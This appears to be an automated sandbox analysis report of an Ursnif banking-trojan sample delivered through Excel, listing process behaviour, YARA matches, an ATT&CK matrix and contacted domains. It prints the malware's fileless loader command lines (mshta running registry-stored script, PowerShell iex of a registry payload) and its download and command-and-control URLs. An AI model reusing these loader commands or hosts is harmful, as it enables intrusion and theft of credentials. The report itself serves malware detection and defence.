Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3155
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2839
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2541
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2100

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\app[1].dll

Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Source: C:\Windows\SysWOW64\regsvr32.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5644	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5644	Thread sleep count: 49 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5644	Thread sleep count: 41 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5644	Thread sleep count: 38 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2156	Thread sleep time: -1667865539s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2156	Thread sleep count: 62 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2156	Thread sleep count: 45 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2156	Thread sleep count: 88 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5752	Thread sleep count: 84 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5752	Thread sleep count: 56 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5752	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4672	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4724	Thread sleep count: 2541 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5324	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 68	Thread sleep count: 2100 > 30

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\regsvr32.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: unknown unknown

Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Copx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Copx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Hl1h='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Hl1h).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'

Source: Yara match

File source: app.xml, type: SAMPLE

Source: regsvr32.exe, 00000003.00000002.590086971.0000000002FD0000.00000002.00000001.sdmp, regsvr32.exe, 00000013.00000002.585926396.0000000003640000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.586261985.0000028656DD0000.00000002.00000001.sdmp, powershell.exe, 00000027.00000002.585702910.000002B5ABD70000.00000002.00000001.sdmp, csc.exe, 0000002F.00000002.583539215.000001E9AEB40000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583966297.0000021D92F30000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: regsvr32.exe, 00000003.00000002.590086971.0000000002FD0000.00000002.00000001.sdmp, regsvr32.exe, 00000013.00000002.585926396.0000000003640000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.586261985.0000028656DD0000.00000002.00000001.sdmp, powershell.exe, 00000027.00000002.585702910.000002B5ABD70000.00000002.00000001.sdmp, csc.exe, 0000002F.00000002.583539215.000001E9AEB40000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583966297.0000021D92F30000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000003.00000002.590086971.0000000002FD0000.00000002.00000001.sdmp, regsvr32.exe, 00000013.00000002.585926396.0000000003640000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.586261985.0000028656DD0000.00000002.00000001.sdmp, powershell.exe, 00000027.00000002.585702910.000002B5ABD70000.00000002.00000001.sdmp, csc.exe, 0000002F.00000002.583539215.000001E9AEB40000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583966297.0000021D92F30000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: regsvr32.exe, 00000003.00000002.590086971.0000000002FD0000.00000002.00000001.sdmp, regsvr32.exe, 00000013.00000002.585926396.0000000003640000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.586261985.0000028656DD0000.00000002.00000001.sdmp, powershell.exe, 00000027.00000002.585702910.000002B5ABD70000.00000002.00000001.sdmp, csc.exe, 0000002F.00000002.583539215.000001E9AEB40000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583966297.0000021D92F30000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_001E4454 cpuid

3_2_001E4454

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_001E6B0F HeapCreate,GetTickCount,GetSystemTimeAsFileTime,SwitchToThread,_aullrem,Sleep,IsWow64Process,

3_2_001E6B0F

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_001E4454 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

3_2_001E4454

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_001E4C1B CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

3_2_001E4C1B

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 19.3.regsvr32.exe.56b94a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.regsvr32.exe.4d894a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000003.508793933.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.508759247.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.508819476.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411957077.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.508778168.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411794580.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411858229.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411885260.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.472132410.0000000004B0E000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.531333562.000000000553C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.508710785.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411972809.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.429184025.0000000004C0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.428651984.0000000004D89000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.520271501.00000000056B9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.508809489.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411764136.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411824879.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.508736134.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.508679200.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411905435.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 5236, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 19.3.regsvr32.exe.56b94a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.regsvr32.exe.4d894a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000003.508793933.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.508759247.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.508819476.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411957077.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.508778168.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411794580.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411858229.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411885260.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.472132410.0000000004B0E000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.531333562.000000000553C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.508710785.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411972809.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.429184025.0000000004C0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.428651984.0000000004D89000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.520271501.00000000056B9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.508809489.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411764136.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411824879.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.508736134.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.508679200.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411905435.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 5236, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation2	DLL Side-Loading1	DLL Side-Loading1	Obfuscated Files or Information1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer3	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Data Encrypted for Impact1
Default Accounts	Native API2	Boot or Logon Initialization Scripts	Process Injection12	DLL Side-Loading1	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Email Collection1	Exfiltration Over Bluetooth	Encrypted Channel22	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution4	Logon Script (Windows)	Logon Script (Windows)	Masquerading1	Security Account Manager	File and Directory Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Command and Scripting Interpreter1	Logon Script (Mac)	Logon Script (Mac)	Virtualization/Sandbox Evasion21	NTDS	System Information Discovery36	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol4	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	PowerShell1	Network Logon Script	Network Logon Script	Process Injection12	LSA Secrets	Query Registry1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Regsvr321	Cached Domain Credentials	Virtualization/Sandbox Evasion21	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	Process Discovery3	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	Application Window Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Owner/User Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
3.2.regsvr32.exe.1e0000.1.unpack	100%	Avira	HEUR/AGEN.1108168		Download File
19.2.regsvr32.exe.fb0000.1.unpack	100%	Avira	HEUR/AGEN.1108168		Download File

Domains

Source	Detection	Scanner	Label	Link
gtr.antoinfer.com	8%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://gtr.antoinfer.com/h_2F93afXj4zv0agU5uGcex/4RttysT472/M4H0F6I1ZWhRsl9Mq/gKfk1C7c8_2F/gareL3qIH	0%	Avira URL Cloud	safe
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
http://gtr.antoinfer.com/k_2Bld_2B868iR7p/iSLerqiJRFRfRPj/I3sykOYq_2B_2BHlkm/lN1n6_2F_/2BoCebPKrVZFk	0%	Avira URL Cloud	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
http://gtr.antoinfer.com/7lD6H27N_2/BPcjmtAv0Zw4YWBW5/_2Fxf1uK6WCO/_2Fjr90UDnf/fvsahgiWLN_2Bo/Vmn_2F	0%	Avira URL Cloud	safe
http://gtr.antoinfer.com/xFDxUxdbnv/F6OYsZZ54L9nW_2Fn/67TmggSh_2FJ/XC_2BJ4ptUf/_2Bn4_2BufrBke/X9TaUV	0%	Avira URL Cloud	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://ofcrecsvcapi-int.azurewebsites.net/	0%	Avira URL Cloud	safe
http://gtr.antoinfer.com/favicon.ico	0%	Avira URL Cloud	safe
http://gtr.antoinfer.com/7lD6H27N_2/BPcjmtAv0Zw4YWBW5/_2Fxf1uK6WCO/_2Fjr90UDnf/fvsahgiWLN_2Bo/Vmn_2FfIBHwVISTOJqyyE/yxzQpB4UhTtBihgn/15wt67RuhdWC2bp/AA4QTb7hSSc7ibwOLz/pdYBrbn9P/IhNkxf132wscOBr5M107/x3K_2BnAOaEK3ZrGH_2/BhQbh5Iq3KL0HGqeYocdUa/aitTSocVb3Ei8/K8Yn7wxH/8ZzNnAARdlf1lpPkD_2FTSI/88hMX1xgXx/WKheFQm4ijbivR_2F/Zqk2tiAD1SrE/7_2FLrw5q4N/ROSXMe9TmWNzIt/lpE2Vas7vRgwYKuDJRzfN/M8anWcq	0%	Avira URL Cloud	safe
http://gtr.antoinfer.com/IW0KvL6zqxcwdal5Ue/sV05YuqDL/CUY_2FYXWgTEAN2MleRL/cOthmAfIFOrxcxXsh59/	0%	Avira URL Cloud	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://officeci.azurewebsites.net/api/	0%	Avira URL Cloud	safe
https://free.mynowministries.com/app.dll	0%	Avira URL Cloud	safe
http://gtr.antoinfer.com/MpeUKSeGn_2/Bk4DEtluQu8Y9R/36MpR_2BhUMN_2FXN2dO6/hANnmINzHP5reb6i/6KJxoqvLx	0%	Avira URL Cloud	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://gtr.antoinfer.com/h_2F93afXj4zv0agU5uGcex/4RttysT472/M4H0F6I1ZWhRsl9Mq/gKfk1C7c8_2F/gare	0%	Avira URL Cloud	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
http://gtr.antoinfer.com/k_2Bld_2B868iR7p/iSLerqiJRFRfRPj/I3sykOYq_2B_2BHlkm/lN1n6_2F_/2BoCebPKrVZFk5Ykbc8d/ir2ifxTr4LNwVXB57AO/naMzNC0NRqAZpafqf_2BA_/2Be4kMQ_2Bs4v/p3vimkya/tnJRXZOQhgPrD4eJIIoOBmz/6_2FqS0VmH/GdEp4ZZJMOcj3fIll/Gr7XyTEKPabp/aWzveP_2B5R/CbkrZ6KMbYewce/4JBfvb8ftJcY5XJZOep1x/uKyVwvTYfdKUGuNG/Emm_2BOgQKRpwFp/DFm1TypwhIB6euZx4o/ZnwoOdebK/P2zkNdJ1mC1FOPRaBbHj/tGtvylAtqDtqZZGz2/K	0%	Avira URL Cloud	safe
https://asgsmsproxyapi.azurewebsites.net/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
gtr.antoinfer.com	165.232.183.49	true	true	8%, Virustotal, Browse	unknown
free.mynowministries.com	162.241.253.78	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://gtr.antoinfer.com/favicon.ico	true	Avira URL Cloud: safe	unknown
